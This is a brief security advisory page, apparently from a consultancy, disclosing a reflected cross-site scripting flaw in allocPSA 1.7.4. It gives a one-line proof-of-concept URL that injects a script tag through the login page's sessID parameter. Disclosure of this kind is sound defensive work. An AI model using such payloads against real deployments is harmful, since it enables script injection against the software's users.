Home
Consulting
Advisories
Software
Articles
Contact

allocPSA 1.7.4 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in allocPSA 1.7.4 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/allocPSA-1.7.4/login/login.php?sessID=%3Cscript%3Ealert%280%29%3C/script%3E


Copyright © 2018 AutoSec Tools LLC